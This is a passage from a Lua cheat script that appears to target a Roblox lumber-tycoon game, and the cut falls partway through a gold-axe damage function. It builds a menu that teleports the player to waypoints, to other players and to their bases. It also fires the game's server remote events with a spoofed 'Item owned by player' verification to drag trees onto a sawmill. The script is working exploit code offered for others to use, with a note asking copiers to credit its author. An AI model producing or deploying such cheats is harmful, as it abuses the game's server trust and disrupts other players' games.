  782. CurrentItem.Size = UDim2.new(0, 80, 0, 80)
  783. CurrentItem.ZIndex = 2
  784. CurrentItem.Image = "rbxassetid://3886256996"
  785. CurrentItem.ScaleType = Enum.ScaleType.Crop
  786.  
  787. Picker.Name = "Picker"
  788. Picker.Parent = MainFrame
  789. Picker.BackgroundColor3 = Color3.fromRGB(196, 40, 28)
  790. Picker.BorderColor3 = Color3.new(0, 0, 0)
  791. Picker.BorderSizePixel = 2
  792. Picker.Position = UDim2.new(0, 390, 1, -460)
  793. Picker.Size = UDim2.new(0, 100, 0, 345)
  794. Picker.CanvasPosition = Vector2.new(0,0)
  795. Picker.CanvasSize = UDim2.new(0, 0, 0, 687)
  796. Picker.ScrollBarThickness = 10
  797. Picker.VerticalScrollBarPosition = Enum.VerticalScrollBarPosition.Left
  798. Picker.Visible = false
  799.  
  800. Player.Name = "Player"
  801. Player.Parent = Picker
  802. Player.BackgroundColor3 = Color3.fromRGB(196, 40, 28)
  803. Player.BorderColor3 = Color3.new(0, 0, 0)
  804. Player.Position = UDim2.new(0, 15, 0, 5)
  805. Player.Size = UDim2.new(0, 80, 0, 80)
  806. Player.ZIndex = 3
  807. Player.Image = "rbxassetid://3888401903"
  808. Player.ScaleType = Enum.ScaleType.Crop
  809. Player.MouseButton1Click:Connect(function()
  810. CurrentItem.Image = "rbxassetid://3886256996"
  811. makesound("rbxassetid://156785206")
  812. AIntroImage.Visible = true
  813. AIntroImage1.Visible = true
  814. end)
  815.  
  816. PlayerFrame.Name = "PlayerFrame"
  817. PlayerFrame.Parent = MenuFrame
  818. PlayerFrame.BackgroundColor3 = Color3.fromRGB(151, 0, 0)
  819. PlayerFrame.BackgroundTransparency = 0
  820. PlayerFrame.BorderColor3 = Color3.new(0, 0, 0)
  821. PlayerFrame.Size = UDim2.new(0, 170, 0, 290)
  822. PlayerFrame.Visible = false
  823.  
  824. PlyrSel.Name = "PlyrSel"
  825. PlyrSel.Parent = PlayerFrame
  826. PlyrSel.BackgroundColor3 = Color3.new(0, 0, 0)
  827. PlyrSel.BackgroundTransparency = 0.15
  828. PlyrSel.BorderColor3 = Color3.new(0, 0, 0)
  829. PlyrSel.Position = UDim2.new(0, 5, 0, 5)
  830. PlyrSel.Size = UDim2.new(0, 160, 0, 20)
  831. PlyrSel.Font = Enum.Font.Fantasy
  832. PlyrSel.FontSize = Enum.FontSize.Size18
  833. PlyrSel.Text = "SELECT A PLAYER"
  834. PlyrSel.TextColor3 = Color3.fromRGB(255, 0, 0)
  835. PlyrSel.TextScaled = true
  836. PlyrSel.TextSize = 17
  837. PlyrSel.TextWrapped = true
  838.  
  839. Player1.Name = "Player1"
  840. Player1.Parent = PlayerFrame
  841. Player1.BackgroundColor3 = Color3.new(0, 0, 0)
  842. Player1.BorderColor3 = Color3.new(0, 0, 0)
  843. Player1.Position = UDim2.new(0, 5, 0, 40)
  844. Player1.Size = UDim2.new(0, 160, 0, 20)
  845. Player1.Font = Enum.Font.Fantasy
  846. Player1.FontSize = Enum.FontSize.Size18
  847. Player1.Text = ""
  848. Player1.TextColor3 = Color3.fromRGB(255, 0, 0)
  849. Player1.TextSize = 16
  850. Player1.TextWrapped = true
  851.  
  852. Player2.Name = "Player2"
  853. Player2.Parent = PlayerFrame
  854. Player2.BackgroundColor3 = Color3.new(0, 0, 0)
  855. Player2.BorderColor3 = Color3.new(0, 0, 0)
  856. Player2.Position = UDim2.new(0, 5, 0, 65)
  857. Player2.Size = UDim2.new(0, 160, 0, 20)
  858. Player2.Font = Enum.Font.Fantasy
  859. Player2.FontSize = Enum.FontSize.Size18
  860. Player2.Text = ""
  861. Player2.TextColor3 = Color3.fromRGB(255, 0, 0)
  862. Player2.TextSize = 16
  863. Player2.TextWrapped = true
  864.  
  865. Player3.Name = "Player3"
  866. Player3.Parent = PlayerFrame
  867. Player3.BackgroundColor3 = Color3.new(0, 0, 0)
  868. Player3.BorderColor3 = Color3.new(0, 0, 0)
  869. Player3.Position = UDim2.new(0, 5, 0, 90)
  870. Player3.Size = UDim2.new(0, 160, 0, 20)
  871. Player3.Font = Enum.Font.Fantasy
  872. Player3.FontSize = Enum.FontSize.Size18
  873. Player3.Text = ""
  874. Player3.TextColor3 = Color3.fromRGB(255, 0, 0)
  875. Player3.TextSize = 16
  876. Player3.TextWrapped = true
  877.  
  878. Player4.Name = "Player4"
  879. Player4.Parent = PlayerFrame
  880. Player4.BackgroundColor3 = Color3.new(0, 0, 0)
  881. Player4.BorderColor3 = Color3.new(0, 0, 0)
  882. Player4.Position = UDim2.new(0, 5, 0, 115)
  883. Player4.Size = UDim2.new(0, 160, 0, 20)
  884. Player4.Font = Enum.Font.Fantasy
  885. Player4.FontSize = Enum.FontSize.Size18
  886. Player4.Text = ""
  887. Player4.TextColor3 = Color3.fromRGB(255, 0, 0)
  888. Player4.TextSize = 16
  889. Player4.TextWrapped = true
  890.  
  891. Player5.Name = "Player5"
  892. Player5.Parent = PlayerFrame
  893. Player5.BackgroundColor3 = Color3.new(0, 0, 0)
  894. Player5.BorderColor3 = Color3.new(0, 0, 0)
  895. Player5.Position = UDim2.new(0, 5, 0, 140)
  896. Player5.Size = UDim2.new(0, 160, 0, 20)
  897. Player5.Font = Enum.Font.Fantasy
  898. Player5.FontSize = Enum.FontSize.Size18
  899. Player5.Text = ""
  900. Player5.TextColor3 = Color3.fromRGB(255, 0, 0)
  901. Player5.TextSize = 16
  902. Player5.TextWrapped = true
  903.  
  904. Player6.Name = "Player6"
  905. Player6.Parent = PlayerFrame
  906. Player6.BackgroundColor3 = Color3.new(0, 0, 0)
  907. Player6.BorderColor3 = Color3.new(0, 0, 0)
  908. Player6.Position = UDim2.new(0, 5, 0, 165)
  909. Player6.Size = UDim2.new(0, 160, 0, 20)
  910. Player6.Font = Enum.Font.Fantasy
  911. Player6.FontSize = Enum.FontSize.Size18
  912. Player6.Text = ""
  913. Player6.TextColor3 = Color3.fromRGB(255, 0, 0)
  914. Player6.TextSize = 16
  915. Player6.TextWrapped = true
  916.  
  917. TpPlayer.Name = "TpPlayer"
  918. TpPlayer.Parent = PlayerFrame
  919. TpPlayer.BackgroundColor3 = Color3.new(0, 0, 0)
  920. TpPlayer.BackgroundTransparency = 0
  921. TpPlayer.BorderColor3 = Color3.new(0, 0, 0)
  922. TpPlayer.Position = UDim2.new(0, 5, 0, 225)
  923. TpPlayer.Size = UDim2.new(0, 75, 0, 35)
  924. TpPlayer.Font = Enum.Font.Fantasy
  925. TpPlayer.FontSize = Enum.FontSize.Size18
  926. TpPlayer.Text = "Tp to Player"
  927. TpPlayer.TextColor3 = Color3.fromRGB(255, 0, 0)
  928. TpPlayer.TextScaled = true
  929. TpPlayer.TextWrapped = true
  930. TpPlayer.TextSize = 14
  931.  
  932. TpBase.Name = "TpBase"
  933. TpBase.Parent = PlayerFrame
  934. TpBase.BackgroundColor3 = Color3.new(0, 0, 0)
  935. TpBase.BackgroundTransparency = 0
  936. TpBase.BorderColor3 = Color3.new(0, 0, 0)
  937. TpBase.Position = UDim2.new(0, 90, 0, 225)
  938. TpBase.Size = UDim2.new(0, 75, 0, 35)
  939. TpBase.Font = Enum.Font.Fantasy
  940. TpBase.FontSize = Enum.FontSize.Size18
  941. TpBase.Text = "Tp to\nBase"
  942. TpBase.TextColor3 = Color3.fromRGB(255, 0, 0)
  943. TpPlayer.TextSize = 22
  944.  
  945.  
  946.  
  947. local WayPoints = {
  948. ["SpawnPoint"] = Vector3.new(155, 3, 74),
  949. ["Link's Logic"] = Vector3.new(4607, 7.5, -798),
  950. ["Fancy Furnishings"] = Vector3.new(491, 3, -1720),
  951. ["Fine Arts Shop"] = Vector3.new(5207, -166, 719),
  952. ["Bob's Shack"] = Vector3.new(260, 8, -2542),
  953. ["Strange Man"] = Vector3.new(1061, 16, 1131),
  954. ["Dock"] = CFrame.new(1114, 3.2, -197),
  955. ["Bridge"] = CFrame.new(113, 15, -977),
  956. ["Shrine Of Sight"] = CFrame.new(-1600, 205, 919),
  957. ["The Den"] = CFrame.new(323, 49, 1930),
  958. ["Volcano Win"] = CFrame.new(-1675, 358, 1476),
  959. ["Cave"] = Vector3.new(3581, -179, 430),
  960. ["Swamp"] = Vector3.new(-1209, 132, -801),
  961. ["SnowGlow Tree"] = CFrame.new(-1105.9, -6, -894),
  962. ["Ski Lodge"] = CFrame.new(1244, 66, 2306)
  963. }
  964.  
  965. Teleport.Name = "Teleport"
  966. Teleport.Parent = Picker
  967. Teleport.BackgroundColor3 = Color3.new(1, 1, 1)
  968. Teleport.BorderColor3 = Color3.new(0, 0, 0)
  969. Teleport.Position = UDim2.new(0, 15, 0,90)
  970. Teleport.Size = UDim2.new(0, 80, 0, 80)
  971. Teleport.ZIndex = 3
  972. Teleport.Image = "rbxassetid://3891269399"
  973. Teleport.ScaleType = Enum.ScaleType.Crop
  974. Teleport.MouseButton1Click:Connect(function()
  975. CurrentItem.Image = "rbxassetid://3886256996"
  976. makesound("rbxassetid://156785206")
  977. AIntroImage.Visible = true
  978. AIntroImage1.Visible = true
  979. end)
  980.  
  981. Waypoints.Name = "Waypoints"
  982. Waypoints.Parent = MenuFrame
  983. Waypoints.BackgroundColor3 = Color3.fromRGB(151, 0, 0)
  984. Waypoints.BorderColor3 = Color3.new(0, 0, 0)
  985. Waypoints.Size = UDim2.new(0, 170, 0, 290)
  986. Waypoints.CanvasPosition = Vector2.new(0,0)
  987. Waypoints.CanvasSize = UDim2.new(0, 0, 0, 360)
  988. Waypoints.Visible = false
  989.  
  990. SpawnPoint.Name = "SpawnPoint"
  991. SpawnPoint.Parent = Waypoints
  992. SpawnPoint.BackgroundColor3 = Color3.new(0, 0, 0)
  993. SpawnPoint.Position = UDim2.new(0, 5, 0, 3)
  994. SpawnPoint.Size = UDim2.new(0, 148, 0, 20)
  995. SpawnPoint.Font = Enum.Font.Fantasy
  996. SpawnPoint.FontSize = Enum.FontSize.Size18
  997. SpawnPoint.Text = "Spawn"
  998. SpawnPoint.TextColor3 = Color3.new(255, 0, 0)
  999. SpawnPoint.TextSize = 16
  1000. SpawnPoint.MouseButton1Down:connect(function()
  1001. makesound("rbxassetid://156785206")
  1002. game.Players.LocalPlayer.Character:MoveTo(WayPoints["SpawnPoint"])
  1003. end)
  1004.  
  1005. PlotTp.Name = "PlotTp"
  1006. PlotTp.Parent = Waypoints
  1007. PlotTp.BackgroundColor3 = Color3.new(0, 0, 0)
  1008. PlotTp.Position = UDim2.new(0, 5, 0, 26)
  1009. PlotTp.Size = UDim2.new(0, 148, 0, 20)
  1010. PlotTp.Font = Enum.Font.Fantasy
  1011. PlotTp.FontSize = Enum.FontSize.Size18
  1012. PlotTp.Text = "Tp to Plot"
  1013. PlotTp.TextColor3 = Color3.fromRGB(255, 0, 0)
  1014. PlotTp.TextSize = 16
  1015. PlotTp.MouseButton1Down:connect(function()
  1016. makesound("rbxassetid://156785206")
  1017. for i,v in pairs(game.Workspace.Properties:GetChildren()) do
  1018. if v.Owner.Value == game.Players.LocalPlayer then
  1019. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = v.OriginSquare.CFrame + Vector3.new(0,10,0)
  1020. end
  1021. end
  1022. end)
  1023.  
  1024. FancyFurnishings.Name = "FancyFurnishings"
  1025. FancyFurnishings.Parent = Waypoints
  1026. FancyFurnishings.BackgroundColor3 = Color3.new(0, 0, 0)
  1027. FancyFurnishings.Position = UDim2.new(0, 5, 0, 49)
  1028. FancyFurnishings.Size = UDim2.new(0, 148, 0, 20)
  1029. FancyFurnishings.Font = Enum.Font.Fantasy
  1030. FancyFurnishings.FontSize = Enum.FontSize.Size18
  1031. FancyFurnishings.Text = "Fancy Furnishings"
  1032. FancyFurnishings.TextColor3 = Color3.new(255, 0, 0)
  1033. FancyFurnishings.TextSize = 16
  1034. FancyFurnishings.MouseButton1Down:connect(function()
  1035. makesound("rbxassetid://156785206")
  1036. game.Players.LocalPlayer.Character:MoveTo(WayPoints["Fancy Furnishings"])
  1037. end)
  1038.  
  1039. LinksLogic.Name = "LinksLogic"
  1040. LinksLogic.Parent = Waypoints
  1041. LinksLogic.BackgroundColor3 = Color3.new(0, 0, 0)
  1042. LinksLogic.Position = UDim2.new(0, 5, 0, 72)
  1043. LinksLogic.Size = UDim2.new(0, 148, 0, 20)
  1044. LinksLogic.Font = Enum.Font.Fantasy
  1045. LinksLogic.FontSize = Enum.FontSize.Size18
  1046. LinksLogic.Text = "Link's Logic"
  1047. LinksLogic.TextColor3 = Color3.new(255, 0, 0)
  1048. LinksLogic.TextSize = 16
  1049. LinksLogic.MouseButton1Down:connect(function()
  1050. makesound("rbxassetid://156785206")
  1051. game.Players.LocalPlayer.Character:MoveTo(WayPoints["Link's Logic"])
  1052. end)
  1053.  
  1054. FineArtsShop.Name = "FineArtsShop"
  1055. FineArtsShop.Parent = Waypoints
  1056. FineArtsShop.BackgroundColor3 = Color3.new(0, 0, 0)
  1057. FineArtsShop.Position = UDim2.new(0, 5, 0, 95)
  1058. FineArtsShop.Size = UDim2.new(0, 148, 0, 20)
  1059. FineArtsShop.Font = Enum.Font.Fantasy
  1060. FineArtsShop.FontSize = Enum.FontSize.Size18
  1061. FineArtsShop.Text = "Fine Arts Shop"
  1062. FineArtsShop.TextColor3 = Color3.new(255, 0, 0)
  1063. FineArtsShop.TextSize = 16
  1064. FineArtsShop.MouseButton1Down:connect(function()
  1065. makesound("rbxassetid://156785206")
  1066. game.Players.LocalPlayer.Character:MoveTo(WayPoints["Fine Arts Shop"])
  1067. end)
  1068.  
  1069. BobsShack.Name = "BobsShack"
  1070. BobsShack.Parent = Waypoints
  1071. BobsShack.BackgroundColor3 = Color3.new(0, 0, 0)
  1072. BobsShack.Position = UDim2.new(0, 5, 0, 118)
  1073. BobsShack.Size = UDim2.new(0, 148, 0, 20)
  1074. BobsShack.Font = Enum.Font.Fantasy
  1075. BobsShack.FontSize = Enum.FontSize.Size18
  1076. BobsShack.Text = "Bob's Shack"
  1077. BobsShack.TextColor3 = Color3.fromRGB(255, 0, 0)
  1078. BobsShack.TextSize = 16
  1079. BobsShack.MouseButton1Down:connect(function()
  1080. makesound("rbxassetid://156785206")
  1081. game.Players.LocalPlayer.Character:MoveTo(WayPoints["Bob's Shack"])
  1082. end)
  1083.  
  1084. TheDen.Name = "TheDen"
  1085. TheDen.Parent = Waypoints
  1086. TheDen.BackgroundColor3 = Color3.new(0, 0, 0)
  1087. TheDen.Position = UDim2.new(0, 5, 0, 141)
  1088. TheDen.Size = UDim2.new(0, 148, 0, 20)
  1089. TheDen.Font = Enum.Font.Fantasy
  1090. TheDen.FontSize = Enum.FontSize.Size18
  1091. TheDen.Text = "The Den"
  1092. TheDen.TextColor3 = Color3.new(255, 0, 0)
  1093. TheDen.TextSize = 16
  1094. TheDen.MouseButton1Down:connect(function()
  1095. makesound("rbxassetid://156785206")
  1096. local uTorso = workspace:WaitForChild(game.Players.LocalPlayer.Name).HumanoidRootPart
  1097. uTorso.CFrame = WayPoints["The Den"]
  1098. end)
  1099.  
  1100. ShrineOfSight.Name = "ShrineOfSight"
  1101. ShrineOfSight.Parent = Waypoints
  1102. ShrineOfSight.BackgroundColor3 = Color3.new(0, 0, 0)
  1103. ShrineOfSight.Position = UDim2.new(0, 5, 0, 164)
  1104. ShrineOfSight.Size = UDim2.new(0, 148, 0, 20)
  1105. ShrineOfSight.Font = Enum.Font.Fantasy
  1106. ShrineOfSight.FontSize = Enum.FontSize.Size18
  1107. ShrineOfSight.Text = "Shrine Of Sight"
  1108. ShrineOfSight.TextColor3 = Color3.new(255, 0, 0)
  1109. ShrineOfSight.TextSize = 16
  1110. ShrineOfSight.MouseButton1Down:connect(function()
  1111. makesound("rbxassetid://156785206")
  1112. local uTorso = workspace:WaitForChild(game.Players.LocalPlayer.Name).HumanoidRootPart
  1113. uTorso.CFrame = WayPoints["Shrine Of Sight"]
  1114. end)
  1115.  
  1116. SkiLodge.Name = "Ski Lodge"
  1117. SkiLodge.Parent = Waypoints
  1118. SkiLodge.BackgroundColor3 = Color3.new(0, 0, 0)
  1119. SkiLodge.Position = UDim2.new(0, 5, 0, 187)
  1120. SkiLodge.Size = UDim2.new(0, 148, 0, 20)
  1121. SkiLodge.Font = Enum.Font.Fantasy
  1122. SkiLodge.FontSize = Enum.FontSize.Size18
  1123. SkiLodge.Text = "Ski Lodge"
  1124. SkiLodge.TextColor3 = Color3.new(255, 0, 0)
  1125. SkiLodge.TextSize = 16
  1126. SkiLodge.MouseButton1Down:connect(function()
  1127. makesound("rbxassetid://156785206")
  1128. local uTorso = workspace:WaitForChild(game.Players.LocalPlayer.Name).HumanoidRootPart
  1129. uTorso.CFrame = WayPoints["Ski Lodge"]
  1130. end)
  1131.  
  1132. Dock.Name = "Dock"
  1133. Dock.Parent = Waypoints
  1134. Dock.BackgroundColor3 = Color3.new(0, 0, 0)
  1135. Dock.Position = UDim2.new(0, 5, 0, 210)
  1136. Dock.Size = UDim2.new(0, 148, 0, 20)
  1137. Dock.Font = Enum.Font.Fantasy
  1138. Dock.FontSize = Enum.FontSize.Size18
  1139. Dock.Text = "Dock"
  1140. Dock.TextColor3 = Color3.new(255, 0, 0)
  1141. Dock.TextSize = 16
  1142. Dock.MouseButton1Down:connect(function()
  1143. makesound("rbxassetid://156785206")
  1144. local uTorso = workspace:WaitForChild(game.Players.LocalPlayer.Name).HumanoidRootPart
  1145. uTorso.CFrame = WayPoints["Dock"]
  1146. end)
  1147.  
  1148. Bridge.Name = "Bridge"
  1149. Bridge.Parent = Waypoints
  1150. Bridge.BackgroundColor3 = Color3.new(0, 0, 0)
  1151. Bridge.Position = UDim2.new(0, 5, 0, 233)
  1152. Bridge.Size = UDim2.new(0, 148, 0, 20)
  1153. Bridge.Font = Enum.Font.Fantasy
  1154. Bridge.FontSize = Enum.FontSize.Size18
  1155. Bridge.Text = "Bridge"
  1156. Bridge.TextColor3 = Color3.new(255, 0, 0)
  1157. Bridge.TextSize = 16
  1158. Bridge.MouseButton1Down:connect(function()
  1159. makesound("rbxassetid://156785206")
  1160. local uTorso = workspace:WaitForChild(game.Players.LocalPlayer.Name).HumanoidRootPart
  1161. uTorso.CFrame = WayPoints["Bridge"]
  1162. end)
  1163.  
  1164. Stranger.Name = "Stranger"
  1165. Stranger.Parent = Waypoints
  1166. Stranger.BackgroundColor3 = Color3.new(0, 0, 0)
  1167. Stranger.Position = UDim2.new(0, 5, 0, 256)
  1168. Stranger.Size = UDim2.new(0, 148, 0, 20)
  1169. Stranger.Font = Enum.Font.Fantasy
  1170. Stranger.FontSize = Enum.FontSize.Size18
  1171. Stranger.Text = "Stranger"
  1172. Stranger.TextColor3 = Color3.fromRGB(255, 0, 0)
  1173. Stranger.TextSize = 16
  1174. Stranger.MouseButton1Down:connect(function()
  1175. makesound("rbxassetid://156785206")
  1176. game.Players.LocalPlayer.Character:MoveTo(WayPoints["Strange Man"])
  1177. end)
  1178.  
  1179. VolcanoWin.Name = "VolcanoWin"
  1180. VolcanoWin.Parent = Waypoints
  1181. VolcanoWin.BackgroundColor3 = Color3.new(0, 0, 0)
  1182. VolcanoWin.Position = UDim2.new(0, 5, 0, 279)
  1183. VolcanoWin.Size = UDim2.new(0, 148, 0, 20)
  1184. VolcanoWin.Font = Enum.Font.Fantasy
  1185. VolcanoWin.FontSize = Enum.FontSize.Size18
  1186. VolcanoWin.Text = "Volcano Win"
  1187. VolcanoWin.TextColor3 = Color3.new(255, 0, 0)
  1188. VolcanoWin.TextSize = 16
  1189. VolcanoWin.MouseButton1Down:connect(function()
  1190. makesound("rbxassetid://156785206")
  1191. local uTorso = workspace:WaitForChild(game.Players.LocalPlayer.Name).HumanoidRootPart
  1192. uTorso.CFrame = WayPoints["Volcano Win"]
  1193. end)
  1194.  
  1195. ShowLocation.Name = "ShowLocation"
  1196. ShowLocation.Parent = Waypoints
  1197. ShowLocation.BackgroundColor3 = Color3.new(0, 0, 0)
  1198. ShowLocation.Position = UDim2.new(0, 5, 0, 302)
  1199. ShowLocation.Size = UDim2.new(0, 148, 0, 30)
  1200. ShowLocation.Font = Enum.Font.Fantasy
  1201. ShowLocation.FontSize = Enum.FontSize.Size14
  1202. ShowLocation.Text = "Show Current Coords\nSet Custom Location"
  1203. ShowLocation.TextColor3 = Color3.new(255, 0, 0)
  1204. ShowLocation.TextSize = 13
  1205.  
  1206. CustomTPPoint.Name = "CustomTPPoint"
  1207. CustomTPPoint.Parent = Waypoints
  1208. CustomTPPoint.BackgroundColor3 = Color3.new(0, 0, 0)
  1209. CustomTPPoint.Position = UDim2.new(0, 5, 0, 335)
  1210. CustomTPPoint.Size = UDim2.new(0, 148, 0, 20)
  1211. CustomTPPoint.Font = Enum.Font.Fantasy
  1212. CustomTPPoint.FontSize = Enum.FontSize.Size14
  1213. CustomTPPoint.Text = "TP to Custom Location"
  1214. CustomTPPoint.TextColor3 = Color3.new(255, 0, 0)
  1215. CustomTPPoint.TextSize = 13
  1216.  
  1217. -- Scripts:
  1218.  
  1219. --- Show Current Location
  1220.  
  1221. ShowLocation.MouseButton1Down:connect(function()
  1222. makesound("rbxassetid://156785206")
  1223.  
  1224. function round(num, numDecimalPlaces)
  1225. local mult = 10^(numDecimalPlaces or 0)
  1226. return math.floor(num * mult + 0.5) / mult
  1227. end
  1228.  
  1229. LocationX = round(game.Players.LocalPlayer.Character.HumanoidRootPart.Position.x, 1)
  1230. LocationY = round(game.Players.LocalPlayer.Character.HumanoidRootPart.Position.y, 1)
  1231. LocationZ = round(game.Players.LocalPlayer.Character.HumanoidRootPart.Position.z, 1)
  1232. ShowLocation.Text = "Current/Set Location\n"..LocationX..", "..LocationY..", "..LocationZ
  1233. CustomTPPoint.Text = "TP to "..LocationX..", "..LocationY..", "..LocationZ
  1234. CustomLocationSet = true
  1235. end)
  1236.  
  1237. --- TP to custom location ---
  1238.  
  1239. CustomTPPoint.MouseButton1Down:connect(function()
  1240. makesound("rbxassetid://156785206")
  1241. if CustomLocationSet == true then
  1242. local uTorso = workspace:WaitForChild(game.Players.LocalPlayer.Name).HumanoidRootPart
  1243. uTorso.CFrame = CFrame.new(LocationX, LocationY, LocationZ)
  1244. end
  1245. end)
  1246.  
  1247.  
  1248. --- Player Tp ---
  1249.  
  1250. local buttons = {
  1251. Player1,
  1252. Player2,
  1253. Player3,
  1254. Player4,
  1255. Player5,
  1256. Player6
  1257. }
  1258. spawn(function()
  1259. while true do
  1260. Player1.Text = ""
  1261. Player2.Text = ""
  1262. Player3.Text = ""
  1263. Player4.Text = ""
  1264. Player5.Text = ""
  1265. Player6.Text = ""
  1266. for i, v in pairs(game.Players:GetChildren()) do
  1267. buttons[i].Text = v.Name
  1268. buttons[i].Visible = true
  1269. end
  1270. wait(0.5)
  1271. end
  1272. end)
  1273.  
  1274. Player1.MouseButton1Down:connect(function()
  1275. makesound("rbxassetid://156785206")
  1276. PlyrSel.Text = Player1.Text
  1277. end)
  1278. Player2.MouseButton1Down:connect(function()
  1279. makesound("rbxassetid://156785206")
  1280. PlyrSel.Text = Player2.Text
  1281. end)
  1282. Player3.MouseButton1Down:connect(function()
  1283. makesound("rbxassetid://156785206")
  1284. PlyrSel.Text = Player3.Text
  1285. end)
  1286. Player4.MouseButton1Down:connect(function()
  1287. makesound("rbxassetid://156785206")
  1288. PlyrSel.Text = Player4.Text
  1289. end)
  1290. Player5.MouseButton1Down:connect(function()
  1291. makesound("rbxassetid://156785206")
  1292. PlyrSel.Text = Player5.Text
  1293. end)
  1294. Player6.MouseButton1Down:connect(function()
  1295. makesound("rbxassetid://156785206")
  1296. PlyrSel.Text = Player6.Text
  1297. end)
  1298.  
  1299. TpPlayer.MouseButton1Down:connect(function()
  1300. makesound("rbxassetid://156785206")
  1301. if PlyrSel.Text == "SELECT A PLAYER" then
  1302. warn("No Player Selected")
  1303. else
  1304. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = workspace[PlyrSel.Text].HumanoidRootPart.CFrame
  1305. end
  1306. end)
  1307. TpBase.MouseButton1Down:connect(function()
  1308. makesound("rbxassetid://156785206")
  1309. for i, v in pairs(game.Workspace.Properties:GetChildren()) do
  1310. if v.Owner.Value == game.Players[PlyrSel.Text] then
  1311. local p= CFrame.new(v.OriginSquare.CFrame.x, v.OriginSquare.CFrame.y +3.5, v.OriginSquare.CFrame.z)
  1312. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = p
  1313. end
  1314. end
  1315. end)
  1316.  
  1317.  
  1318. Woodmenu.Name = "Woodmenu"
  1319. Woodmenu.Parent = Picker
  1320. Woodmenu.BackgroundColor3 = Color3.new(1, 1, 1)
  1321. Woodmenu.BorderColor3 = Color3.new(0, 0, 0)
  1322. Woodmenu.Position = UDim2.new(0, 15, 0,175)
  1323. Woodmenu.Size = UDim2.new(0, 80, 0, 80)
  1324. Woodmenu.ZIndex = 3
  1325. Woodmenu.Image = "rbxassetid://3894370075"
  1326. Woodmenu.ScaleType = Enum.ScaleType.Crop
  1327. Woodmenu.MouseButton1Click:Connect(function()
  1328. CurrentItem.Image = "rbxassetid://3886256996"
  1329. makesound("rbxassetid://156785206")
  1330. AIntroImage.Visible = true
  1331. AIntroImage1.Visible = true
  1332. end)
  1333.  
  1334. WoodFrame.Name = "WoodFrame"
  1335. WoodFrame.Parent = MenuFrame
  1336. WoodFrame.BorderSizePixel = 1
  1337. WoodFrame.BackgroundTransparency = 0
  1338. WoodFrame.BorderColor3 = Color3.new(0, 0, 0)
  1339. WoodFrame.BackgroundColor3 = Color3.fromRGB(151, 0, 0)
  1340. WoodFrame.Size = UDim2.new(0, 170, 0, 256)
  1341. WoodFrame.Visible = false
  1342.  
  1343. SawmillTp.Name = "SawmillTp"
  1344. SawmillTp.Parent = WoodFrame
  1345. SawmillTp.BackgroundColor3 = Color3.new(0, 0, 0)
  1346. SawmillTp.BorderColor3 = Color3.new(0, 0, 0)
  1347. SawmillTp.Position = UDim2.new(0, 3, 0, 3)
  1348. SawmillTp.Size = UDim2.new(0, 165, 0, 20)
  1349. SawmillTp.Font = Enum.Font.Fantasy
  1350. SawmillTp.FontSize = Enum.FontSize.Size18
  1351. SawmillTp.Text = "Wood to Saw"
  1352. SawmillTp.TextColor3 = Color3.new(265, 0, 0)
  1353. SawmillTp.TextSize = 15
  1354. SawmillTp.MouseButton1Down:connect(function()
  1355. makesound("rbxassetid://156785206")
  1356.  
  1357. SawmillTp.Text = "WOOD TO SAW ON"
  1358. SawmillTp.TextColor3 = Color3.new(0, 1, 0)
  1359. SawmillC = false
  1360. Mouse = game.Players.LocalPlayer:GetMouse()
  1361.  
  1362. Mouse.KeyDown:connect(function(key)
  1363. if key:lower() == "q" then
  1364. Treee = Mouse.Target
  1365. end
  1366. end)
  1367. Mouse.KeyDown:connect(function(key)
  1368. if key:lower() == "p" then
  1369. if Mouse.Target.Parent:FindFirstChild("BlockageAlert") then
  1370. Sawmill = Mouse.Target.Parent
  1371. else
  1372. Sawmill=Mouse.Target.Parent.Parent
  1373. end
  1374. if Sawmill:FindFirstChild("BlockageAlert") and Sawmill:FindFirstChild("Owner") then
  1375. SawmillC = true
  1376. else
  1377. SawmillC = false
  1378. print"Something went wrong while setting the sawmill!"
  1379. end
  1380. if Treee ~= nil then
  1381. Mod(Treee)
  1382. else
  1383. print("Select tree with 'Q'!")
  1384. end
  1385. end
  1386. end)
  1387.  
  1388. function Mod(SelectedPart)
  1389. if SawmillC ~= true then
  1390. print'Set the sawmill with "P"!'
  1391. return
  1392. end
  1393. if SelectedPart.Parent:FindFirstChild("TreeClass") and SelectedPart.Parent:FindFirstChild("Owner") then
  1394. print("Tree: "..SelectedPart.Parent.TreeClass.Value)
  1395. Tree = SelectedPart.Parent
  1396. Tree.PrimaryPart = SelectedPart
  1397. game.ReplicatedStorage.Interaction.Verify:FireServer('Item owned by player',Tree)
  1398. Tree:SetPrimaryPartCFrame(Sawmill.Particles.CFrame)
  1399. game.ReplicatedStorage.Interaction.ClientIsDragging:FireServer(Tree)
  1400. end
  1401. end
  1402. end)
  1403.  
  1404. Goldaxe.Name = "SawmillTp"
  1405. Goldaxe.Parent = WoodFrame
  1406. Goldaxe.BackgroundColor3 = Color3.new(0, 0, 0)
  1407. Goldaxe.BorderColor3 = Color3.new(0, 0, 0)
  1408. Goldaxe.Position = UDim2.new(0, 3, 0, 26)
  1409. Goldaxe.Size = UDim2.new(0, 165, 0, 20)
  1410. Goldaxe.Font = Enum.Font.Fantasy
  1411. Goldaxe.FontSize = Enum.FontSize.Size18
  1412. Goldaxe.Text = "Gold Axe Off"
  1413. Goldaxe.TextColor3 = Color3.new(255, 0, 0)
  1414. Goldaxe.TextSize = 15
  1415. spawn(function()
  1416. --Credits to Johiro, if you decide to skid atleast give credits
  1417. GAxe = false
  1418. function GetAxe() --Gets your current axe thats equiped when called
  1419. if game.Players.LocalPlayer.Character:FindFirstChild("Tool") then
  1420. return game.Players.LocalPlayer.Character.Tool --returns the axe when found
  1421. else
  1422. return false --returns false when not equiped
  1423. end
  1424. end
  1425.  
  1426. function GetDamage(Axe, TreeClass)-- Gets the right Damage of the axe and returns it if called to prevent killing yourself like gold axe
  1427. if Axe.ToolTip == "Basic Hatchet" then return 0.2
  1428. elseif Axe.ToolTip == "Plain Axe" then return 0.55
  1429. elseif Axe.ToolTip == "Steel Axe" then return 0.93
  1430. elseif Axe.ToolTip == "Hardened Axe" then return 1.45
  1431. elseif Axe.ToolTip == "Silver Axe" then return 1.6
  1432. elseif Axe.ToolTip == "Rukiryaxe" then return 1.68
  1433. elseif Axe.ToolTip == "Beta Axe of Bosses" then return 1.45
  1434. elseif Axe.ToolTip == "Alpha Axe of Testing" then return 1.5
  1435. elseif Axe.ToolTip == "Fire Axe" then
